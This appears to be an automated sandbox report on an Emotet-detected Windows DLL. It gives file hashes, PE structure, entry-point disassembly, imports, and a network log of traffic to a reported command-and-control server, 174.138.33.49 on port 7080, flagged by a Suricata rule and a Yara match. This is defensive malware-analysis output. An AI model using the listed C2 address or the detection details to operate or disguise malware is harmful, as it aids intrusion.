                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.8.9.6.<./.P.i.d.>.......
                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):4733
                                                                    Entropy (8bit):4.488917511624953
                                                                    Encrypted:false
                                                                    SSDEEP:48:cvIwSD8zsqJgtBI9oeWgc8sqYj1a8fm8M4JC/WC/JsFP+yq85m/EkZESC5SRd:uITf4qfgrsqYpvJ8b6+9hVvRd
                                                                    MD5:03A8266176247D4230025BA8D9AF1772
                                                                    SHA1:FED690D9A1A7086A597B418949F8C37323751285
                                                                    SHA-256:AA9C108A14F8B04E30FD522AF6327172D809E5DD94B8668DDA229D1CF9CD988C
                                                                    SHA-512:92A1E68401BE0F368347E41EBD3BAF3241567D6C387E9A465AB8D0E66AA13E3360ABE225679C7BA24203C83E48E2284351A28C1071DE13631B80FE2DF8E8BB05
                                                                    Malicious:false
                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1614608" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                    Process:C:\Windows\System32\svchost.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):53030
                                                                    Entropy (8bit):3.0405121690366794
                                                                    Encrypted:false
                                                                    SSDEEP:1536:qmHjfXV+vnUwuufdGpupKCxqgafJIRbefeZUNjYs0rG:qmHjfXV+vnUwuufdGpupKaqgafJIRbe5
                                                                    MD5:7D1A88D60AF131C65C41EAF82B0BDEDA
                                                                    SHA1:606F6D475DB41C98C1C3A50E9ADFDBD3933E5F57
                                                                    SHA-256:837BCFBD3BC1953219F1DB90CBE1B34E991CE28DA0AD3F9D3AE530A916061087
                                                                    SHA-512:A439134254BF5E700398ED342298DB0DBBA141D8B167701E01A073166C2AC6CBC70D3372E91BA33C0920BF7C6F3181D3946D3E0B330362782E0560E2D41A08ED
                                                                    Malicious:false
                                                                    Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                    Process:C:\Windows\System32\svchost.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):13340
                                                                    Entropy (8bit):2.7042695129115457
                                                                    Encrypted:false
                                                                    SSDEEP:96:kiZYWR4EGQY0iYGQPiHSUYEZBOt8iOO78dwaWuzraoLRtKlcNIcNy:hZDNELvWuXaoLRtKGScNy
                                                                    MD5:D113A605C42A9F5B80205B269AFE4CD8
                                                                    SHA1:CF90AA4AB1E3B96324E23C137534C2724086C13A
                                                                    SHA-256:E75D7414ADD5AEFF36D29530716015AF2E6141BB95B1A7C35606363169D1143A
                                                                    SHA-512:FCBD8EB398D82EB7B866C6EC6B4305C8448AB5AFE4C36DC04F091301423177BBAD8ACA98D9A62D56574EF3DE0D4B76456E3C489B69B78DC84E8496FED1897FCB
                                                                    Malicious:false
                                                                    Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.2.6.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                    Process:C:\Windows\System32\svchost.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):13340
                                                                    Entropy (8bit):2.7045158693525706
                                                                    Encrypted:false
                                                                    SSDEEP:96:kiZYWGMk+kONYxYSQOpHSUYEZpst8i5O78qwTSG8PtDaGL1DKlcNIbNy:hZDGtSGTQSZtDaGL1DKGSbNy
                                                                    MD5:DDA604DCF734EE681590803CEC9FAFE3
                                                                    SHA1:862AA166DA42679D7DCA16A4273F829C04FA219E
                                                                    SHA-256:6444E6B751946D2B298A87E8EA6589E582E2DD588F5D4790B59A8952EA6F862D
                                                                    SHA-512:FA7D844BB510EFE0F1A4BE13AAFA94E94216AD0D6B7290B3AD505E7E3D17435531855D911A135B38C73E99CECA0DD0D0C8EB068FBB21CE2B83F128D66F7A5E2B
                                                                    Malicious:false
                                                                    Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.2.6.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                    Process:C:\Windows\System32\regsvr32.exe
                                                                    File Type:Microsoft Cabinet archive data, 61712 bytes, 1 file
                                                                    Category:dropped
                                                                    Size (bytes):61712
                                                                    Entropy (8bit):7.995044632446497
                                                                    Encrypted:true
                                                                    SSDEEP:1536:gzjJiDImMsrjCtGLaexX/zL09mX/lZHIxs:gPJiDI/sr0Hexv/0S/zx
                                                                    MD5:589C442FC7A0C70DCA927115A700D41E
                                                                    SHA1:66A07DACE3AFBFD1AA07A47E6875BEAB62C4BB31
                                                                    SHA-256:2E5CB72E9EB43BAAFB6C6BFCC573AAC92F49A8064C483F9D378A9E8E781A526A
                                                                    SHA-512:1B5FA79E52BE495C42CF49618441FB7012E28C02E7A08A91DA9213DB3AB810F0E83485BC1DD5F625A47D0BA7CFCDD5EA50ACC9A8DCEBB39F048C40F01E94155B
                                                                    Malicious:false
                                                                    Preview:MSCF............,...................I........y.........Tf. .authroot.stl..W.`.4..CK..8U[...q.yL'sf!d.D..."2.2g.<dVI.!.....$).\...!2s..(...[.T7..{}...g....g.....w.km$.&|..qe.n.8+..&...O...`...+..C......`h!0.I.(C..1Q*L.p..".s..B.....H......fUP@..5...(X#.t.2lX.>.y|D.0Z0...M....I(.#.-... ...(.J....2..`.hO..{l+.bd7y.j..u.....3....<......3....s.T...._.'...%{v...s..............KgV.0..X=.A.9w9.Ea.x..........\.=.e.C2......9.......`.o... .......@pm.. a.....-M.....{...s.mW.....;.+...A......0.g..L9#.v.&O>./xSH.S.....GH.6.j...`2.(0g..... Lt........h4.iQ?....[.K.....uI......}.....d....M.....6q.Q~.0.\.'U^)`..u.....-........d..7...2.-.2+3.....A./.%Q...k...Q.,...H.B.%..O..x..5\...Hk.......B.';"Ym.'....X.l.E.6..a8.6..nq..x.r4..1t.....,..u.O..O.L...Uf...X.u.F .(.(.....".q...n{%U.-u....l6!....Z....~o0.}Q'.s.i....7...>4x...A.h.Mk].O.z.].6...53...b^;..>e..x.'1..\p.O.k..B1w..|..K.R.....2.e0..X.^...I...w..!.v5B]x..z.6.G^uF..].b.W...'..I.;..p..@L{.E..@W..3.&...
                                                                    Process:C:\Windows\System32\regsvr32.exe
                                                                    File Type:data
                                                                    Category:modified
                                                                    Size (bytes):326
                                                                    Entropy (8bit):3.1297566246827087
                                                                    Encrypted:false
                                                                    SSDEEP:6:kKme+N+SkQlPlEGYRMY9z+4KlDA3RUeWlEZ21:+eNkPlE99SNxAhUeE1
                                                                    MD5:A42B93B0EC145424B2143A7E54D44391
                                                                    SHA1:46B8C15CCF1EEB1A3E06B2AD72434B33E8466FB7
                                                                    SHA-256:9B6D154A211EA55DA2EF86DCEDA82C22BD0868650C70EE05239917587950244E
                                                                    SHA-512:80B432F4390423D2D7CF28FDFC1D4DFAAEFF939B3576F745775F0FD674F1517C4C10E1BB7B3193506F8A4795DD0DDF5C0C9438DE91A42415F1E40CF5802D81B7
                                                                    Malicious:false
                                                                    Preview:p...... ........k.'.....(....................................................... .........L.........$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.9.f.4.c.9.6.9.8.b.d.8.1.:.0."...
                                                                    Process:C:\Windows\System32\svchost.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):55
                                                                    Entropy (8bit):4.306461250274409
                                                                    Encrypted:false
                                                                    SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                    MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                    SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                    SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                    SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                    Malicious:false
                                                                    Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                    File type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                    Entropy (8bit):7.372720093100094
                                                                    TrID:
                                                                    • Win64 Dynamic Link Library (generic) (102004/3) 86.43%
                                                                    • Win64 Executable (generic) (12005/4) 10.17%
                                                                    • Generic Win/DOS Executable (2004/3) 1.70%
                                                                    • DOS Executable Generic (2002/1) 1.70%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
                                                                    File name:MIpuuSiSZ4.dll
                                                                    File size:850944
                                                                    MD5:1dd34935a785a419fb552b5086ea682e
                                                                    SHA1:c6c966e4ba623f9972273de07b842ffbb9a9efce
                                                                    SHA256:8b5a10f9a8f2b25057442111a01faf021ef7e048eab875a4078a44758d952c6f
                                                                    SHA512:79ab4a827fd581cd87fad4b0470bfcaf26f9471181c6c199706c54cc1b636cc7719306feac1b50c24d051f65c3b4d84bc662b8e33c03a1fced07f8023689dcfc
                                                                    SSDEEP:12288:jRCGXj4KVB9abMfyzfqvHWnyPv+LVHT2+2JNdX712kBjtOJZObrGzifb97Vw+Uvf:kGXj3X7FjkZqrqiBVwDbu5nP2F
                                                                    TLSH:7005D06773A509B5E0B7D139CA128E86FAB2BC091720F74B03E495752F23750A67F722
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........d..t7..t7..t7w.w6..t7w.q6!.t7w.p6..t7..q6..t7..p6..t7..w6..t7w.u6..t7..u7..t7e.q6..t7e.t6..t7e..7..t7...7..t7e.v6..t7Rich..t
                                                                    Icon Hash:74f0e4ecccdce0e4
                                                                    Entrypoint:0x180002c54
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x180000000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DLL
                                                                    DLL Characteristics:HIGH_ENTROPY_VA, NX_COMPAT
                                                                    Time Stamp:0x62CC7629 [Mon Jul 11 19:12:41 2022 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:6
                                                                    OS Version Minor:0
                                                                    File Version Major:6
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:6
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:c2b03f92959f67ac494853faf0032582
                                                                    Instruction
                                                                    dec eax
                                                                    mov dword ptr [esp+08h], ebx
                                                                    dec eax
                                                                    mov dword ptr [esp+10h], esi
                                                                    push edi
                                                                    dec eax
                                                                    sub esp, 20h
                                                                    dec ecx
                                                                    mov edi, eax
                                                                    mov ebx, edx
                                                                    dec eax
                                                                    mov esi, ecx
                                                                    cmp edx, 01h
                                                                    jne 00007F0048B8B8E7h
                                                                    call 00007F0048B8BF9Ch
                                                                    dec esp
                                                                    mov eax, edi
                                                                    mov edx, ebx
                                                                    dec eax
                                                                    mov ecx, esi
                                                                    dec eax
                                                                    mov ebx, dword ptr [esp+30h]
                                                                    dec eax
                                                                    mov esi, dword ptr [esp+38h]
                                                                    dec eax
                                                                    add esp, 20h
                                                                    pop edi
                                                                    jmp 00007F0048B8B750h
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    dec eax
                                                                    and dword ptr [ecx+10h], 00000000h
                                                                    dec eax
                                                                    lea eax, dword ptr [0005B5E0h]
                                                                    dec eax
                                                                    mov dword ptr [ecx], eax
                                                                    dec eax
                                                                    mov eax, ecx
                                                                    dec eax
                                                                    mov dword ptr [ecx+08h], edx
                                                                    ret
                                                                    int3
                                                                    inc eax
                                                                    push ebx
                                                                    dec eax
                                                                    sub esp, 20h
                                                                    dec eax
                                                                    mov ebx, ecx
                                                                    dec eax
                                                                    mov eax, edx
                                                                    dec eax
                                                                    lea ecx, dword ptr [0005B591h]
                                                                    xorps xmm0, xmm0
                                                                    dec eax
                                                                    mov dword ptr [ebx], ecx
                                                                    dec eax
                                                                    lea edx, dword ptr [ebx+08h]
                                                                    dec eax
                                                                    lea ecx, dword ptr [eax+08h]
                                                                    movups dqword ptr [edx], xmm0
                                                                    call 00007F0048B8D6B0h
                                                                    dec eax
                                                                    lea eax, dword ptr [0005B5A4h]
                                                                    dec eax
                                                                    mov dword ptr [ebx], eax
                                                                    dec eax
                                                                    mov eax, ebx
                                                                    dec eax
                                                                    add esp, 20h
                                                                    pop ebx
                                                                    ret
                                                                    dec eax
                                                                    and dword ptr [ecx+10h], 00000000h
                                                                    dec eax
                                                                    lea eax, dword ptr [0005B59Ch]
                                                                    dec eax
                                                                    mov dword ptr [ecx+08h], eax
                                                                    dec eax
                                                                    lea eax, dword ptr [0005B581h]
                                                                    dec eax
                                                                    mov dword ptr [ecx], eax
                                                                    dec eax
                                                                    mov eax, ecx
                                                                    ret
                                                                    int3
                                                                    int3
                                                                    inc eax
                                                                    push ebx
                                                                    dec eax
                                                                    sub esp, 20h
                                                                    dec eax
                                                                    mov ebx, ecx
                                                                    dec eax
                                                                    mov eax, edx
                                                                    dec eax
                                                                    lea ecx, dword ptr [0005B535h]
                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x6eeb00x414.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x6f2c40x64.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x790000x5b020.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x730000x4638.pdata
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xd50000x80c.reloc
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x687c00x1c.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x687e00x138.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x5d0000x338.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x10000x5b4c00x5b600False0.39445376624487005data6.495530086549807IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                    .rdata0x5d0000x12dae0x12e00False0.39502276490066224data5.29311907790045IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .data0x700000x27400xe00False0.17606026785714285data2.4721317906474725IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .pdata0x730000x46380x4800False0.5061848958333334data5.700987254121771IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    _RDATA0x780000xf40x200False0.306640625data1.9910589321100538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .rsrc0x790000x5b0200x5b200False0.9233324759945131data7.923209381955667IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .reloc0xd50000x80c0xa00False0.453515625data4.916763645477666IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                    NameRVASizeTypeLanguageCountry
                                                                    RT_HTML0x790a00x5ae00dataEnglishUnited States
                                                                    RT_MANIFEST0xd3ea00x17dXML 1.0 document textEnglishUnited States
                                                                    DLLImport
                                                                    KERNEL32.dllLockResource, CreateFileW, OutputDebugStringW, LoadResource, GetModuleFileNameW, VirtualAllocExNuma, WriteConsoleW, FindResourceA, GetCurrentProcess, CloseHandle, ReadConsoleW, ReadFile, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwindEx, RtlPcToFileHeader, RaiseException, InterlockedPushEntrySList, InterlockedFlushSList, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, EncodePointer, ExitProcess, GetModuleHandleExW, GetCurrentThread, HeapFree, HeapAlloc, GetStdHandle, GetFileType, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, GetDateFormatW, GetTimeFormatW, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetProcessHeap, SetConsoleCtrlHandler, GetStringTypeW, GetFileSizeEx, SetFilePointerEx, SetStdHandle, HeapSize, HeapReAlloc, FlushFileBuffers, WriteFile, GetConsoleOutputCP, GetConsoleMode, RtlUnwind
                                                                    USER32.dllLoadStringW
                                                                    ADVAPI32.dllRegDeleteKeyW, RegCreateKeyExW, RegCloseKey, RegSetValueExW
                                                                    ole32.dllStringFromCLSID, CoTaskMemFree
                                                                    NameOrdinalAddress
                                                                    AddStroke20x180001744
                                                                    AddWordsToWordList30x180001970
                                                                    AdviseInkChange40x180001978
                                                                    CloneContext50x18000197c
                                                                    CreateContext60x180001984
                                                                    CreateRecognizer70x1800019ec
                                                                    DestroyAlternate80x180001a54
                                                                    DestroyContext90x180001a5c
                                                                    DestroyRecognizer100x180001ac4
                                                                    DestroyWordList110x180001ae8
                                                                    DllRegisterServer120x180001e0c
                                                                    DllUnregisterServer130x180001fc0
                                                                    GetBestResultString10x1800010b8
                                                                    GetContextPreferenceFlags140x18000201c
                                                                    GetContextPropertyList150x180002024
                                                                    GetContextPropertyValue160x18000202c
                                                                    GetEnabledUnicodeRanges170x180002034
                                                                    GetGuide180x18000203c
                                                                    GetLatticePtr190x180002080
                                                                    GetLeftSeparator200x1800022a4
                                                                    GetPreferredPacketDescription210x1800022ac
                                                                    GetRecoAttributes220x180002328
                                                                    GetResultPropertyList230x180002340
                                                                    GetRightSeparator240x180002348
                                                                    GetUnicodeRanges250x180002350
                                                                    IsStringSupported260x180002358
                                                                    MakeWordList270x180002360
                                                                    Process280x180002368
                                                                    ResetContext290x180002688
                                                                    SetCACMode300x1800026e0
                                                                    SetContextPropertyValue310x1800026e8
                                                                    SetEnabledUnicodeRanges320x1800026f0
                                                                    SetFactoid330x1800026f8
                                                                    SetFlags340x1800026fc
                                                                    SetGuide350x180002700
                                                                    SetTextContext360x1800027a8
                                                                    SetWordList370x1800027b0
                                                                    Language of compilation systemCountry where language is spokenMap
                                                                    EnglishUnited States
                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                    192.168.2.7174.138.33.494979470802404316 07/22/22-13:58:44.263207TCP2404316ET CNC Feodo Tracker Reported CnC Server TCP group 9497947080192.168.2.7174.138.33.49
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Jul 22, 2022 13:58:44.263206959 CEST497947080192.168.2.7174.138.33.49
                                                                    Jul 22, 2022 13:58:44.370028973 CEST708049794174.138.33.49192.168.2.7
                                                                    Jul 22, 2022 13:58:44.370176077 CEST497947080192.168.2.7174.138.33.49
                                                                    Jul 22, 2022 13:58:44.402960062 CEST497947080192.168.2.7174.138.33.49
                                                                    Jul 22, 2022 13:58:44.509370089 CEST708049794174.138.33.49192.168.2.7
                                                                    Jul 22, 2022 13:58:44.540781021 CEST708049794174.138.33.49192.168.2.7
                                                                    Jul 22, 2022 13:58:44.540803909 CEST708049794174.138.33.49192.168.2.7
                                                                    Jul 22, 2022 13:58:44.540869951 CEST497947080192.168.2.7174.138.33.49
                                                                    Jul 22, 2022 13:58:44.540894985 CEST497947080192.168.2.7174.138.33.49
                                                                    Jul 22, 2022 13:58:51.413127899 CEST497947080192.168.2.7174.138.33.49
                                                                    Jul 22, 2022 13:58:51.526726961 CEST708049794174.138.33.49192.168.2.7
                                                                    Jul 22, 2022 13:58:51.526912928 CEST497947080192.168.2.7174.138.33.49
                                                                    Jul 22, 2022 13:58:51.534461975 CEST497947080192.168.2.7174.138.33.49
                                                                    Jul 22, 2022 13:58:51.682136059 CEST708049794174.138.33.49192.168.2.7
                                                                    Jul 22, 2022 13:58:52.064332008 CEST708049794174.138.33.49192.168.2.7
                                                                    Jul 22, 2022 13:58:52.064538002 CEST497947080192.168.2.7174.138.33.49
                                                                    Jul 22, 2022 13:58:55.067655087 CEST708049794174.138.33.49192.168.2.7
                                                                    Jul 22, 2022 13:58:55.067689896 CEST708049794174.138.33.49192.168.2.7
                                                                    Jul 22, 2022 13:58:55.067923069 CEST497947080192.168.2.7174.138.33.49
                                                                    Jul 22, 2022 14:00:36.722028017 CEST497947080192.168.2.7174.138.33.49
                                                                    Jul 22, 2022 14:00:36.722055912 CEST497947080192.168.2.7174.138.33.49

                                                                    Click to jump to process

                                                                    Click to jump to process

                                                                    Click to dive into process behavior distribution

                                                                    Click to jump to process

                                                                    Target ID:0
                                                                    Start time:13:57:12
                                                                    Start date:22/07/2022
                                                                    Path:C:\Windows\System32\loaddll64.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:loaddll64.exe "C:\Users\user\Desktop\MIpuuSiSZ4.dll"
                                                                    Imagebase:0x7ff620870000
                                                                    File size:140288 bytes
                                                                    MD5 hash:4E8A40CAD6CCC047914E3A7830A2D8AA
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
